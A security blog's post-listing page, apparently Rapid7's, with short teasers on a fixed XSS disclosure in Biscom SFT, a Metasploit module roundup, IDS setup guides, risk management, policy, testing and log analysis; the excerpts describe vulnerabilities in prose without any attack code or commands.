All Posts

2 min Vulnerability Disclosure

R7-2017-06 | CVE-2017-5241: Biscom SFT XSS (FIXED)

Summary The Workspaces component of Biscom Secure File Transfer (SFT) version 5.1.1015 is vulnerable to stored cross-site scripting in two fields. An attacker would need to have the ability to create a Workspace and entice a victim to visit the malicious page in order to run malicious Javascript in the context of the victim's browser. Since the victim is necessarily authenticated, this can allow the attacker to perform actions on the Biscom Secure File Transfer instance on the victim's behalf.

2 min Public Policy

Legislation to Strengthen IoT Marketplace Transparency

Senator Ed Markey (D-MA) is poised to introduce legislation to develop a voluntary cybersecurity standards program for the Internet of Things (IoT) . The legislation, called the Cyber Shield Act, would enable IoT products that comply with the standards to display a label indicating a strong level of security to consumers – like an Energy Star rating for IoT. Rapid7 supports this legislation and believes greater transpa
2 min Automation and Orchestration

Setting Up and Managing a Bug Bounty Program

Synopsis Bug bounties have become mainstream and rightfully so. They offer a method to access and harness the intelligence of varied set of expert hackers and security researchers without having to incur the cost of hiring an army of security professionals. The main advantage though is that one can keep a step ahead of the malicious hackers. This article talks about how to setup a bug bounty program and some of the pitfalls to watch out for. When to do a Bug Bounty ? One obvious question that w
5 min Automation and Orchestration

How to Install and Use PSAD IDS on Ubuntu Linux

Synopsys PSAD also known as Port Scan Attack Detector is a collection of lightweight system daemons that run on Linux system and analyze iptables log messages to detect port scans and other suspicious traffic.PSAD is used to change an Intrusion Detection System into an Intrusion Prevention System. PSAD uses Snort rules for the detection of intrusion events. It is specially designed to work with Linux iptables/firewalld to detect suspicious traffic such as, port scans, backdoors and botnet comman
4 min Automation and Orchestration

How to Install and Configure Bro on Ubuntu Linux

Synopsis Bro is a free open source Unix based network analysis framework started by Vern Paxson. Bro provides a comprehensive platform for collecting network measurements, conducting forensic investigations and traffic baselining. Bro comes with powerful analysis engine which makes it powerful intrusion detection system and network analysis framework. Bro comes with a powerful set of features, some of them are listed below: * Runs on commodity hardware and supports Linux, FreeBSD and MacOS.

4 min Automation and Orchestration

Information Security Risk Management - Introduction

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. Very often technical solutions (cybersecurity products) are presented as “risk management” solutions without process-related context. Modern cybersecurity risk management is not possible without
4 min Automation and Orchestration

Information Security Risk Management - Tiered Approach of NIST SP 800-39

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. In this series of articles, I explain notions and describe processes related to risk management. I also review NIST and ISO standards related to information security risk management. In theprevious article

4 min Automation and Orchestration

Information Security Risk Management Cycle - Context Establishment Phase

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. In this series of articles, I explain notions and describe processes related to risk management. I also review NIST and ISO standards related to information security risk management. In the previous article, I reviewed the tiered risk management approach described in NIS
5 min Automation and Orchestration

The Effective Components of Security Orchestration

It’s one thing to have a plan for security orchestration , but it’s another to get it up and running and use it to its full potential. At this point, most security professionals know that security orchestration and automation are a “need to have,” not a “nice to have,” but to fully leverage security orchestration, there are a few considerations that will help yo
6 min InsightOps

What is BDD Testing: Practical Examples of Behavior Driven Development Testing

The Need for Behavior Driven Development (BDD) Testing Tools It should come as no surprise to learn that testing is at the heart of our engineers' daily activities. Testing is intrinsic to our development process, both in practical terms and in our thinking. Our engineers work with complex systems that are made up of complex components. Individual components may have many external dependencies. When testing, the scope of what is to be tested is important – it can be system wide, focused on a p
5 min InsightOps

5 Ways to Use Log Data to Analyze System Performance

Analyzing System Performance Using Log Data Recently we examined some of the most common behaviors that our community of 25,000 users looked for in their logs, with a particular focus on web server logs. In fact, our research identified the top 15 web server tags and alerts created by our customers—you can read more about these in our https://logentries.com/doc/community-insights/ section—and you can also easily create tags or alerts based on the patterns to identify these behaviors in your sys
2 min Metasploit

Metasploit Wrapup: June 16, 2017

A fresh, new UAC bypass module for Windows 10! Leveraging the behavior of fodhelper.exe and a writable registry key as a normal user, you too can be admin! Unpatched as of last week, this bypass module works on Windows 10 only, but it works like a charm! Reach out and allocate something This release offers up a fresh denial/degradation of services exploit against hosts running a vulnerable version of rpcbind. Specifically, you can repea
4 min Microsoft

Announcing Microsoft Azure Asset Discovery in InsightVM

Almost every security or IT practitioner is familiar with the ascent and continued dominance of Amazon Web Services (AWS). But you only need to peel back a layer or two to find Microsoft Azure growing its own market share and establishing its position as the most-used, most-likely-to-renew

4 min Public Policy

Rapid7 issues comments on NAFTA renegotiation

In April 2017, President Trump issued an executive order directing a review of all trade agreements. This process is now underway: The United States Trade Representative (USTR) – the nation's lead trade agreement negotiator – formally requested public input on objectives for the renegotiation of the North American Free Trade Agreement (NAFTA). NAFTA is a trade agreement between the US, Canada, and Mexico, that covers a huge range of topics, fr
4 min Application Security

What Is User Enumeration?

User enumeration is when a malicious actor can use brute-force to either guess or confirm valid users in a system.

Popular Topics

Tags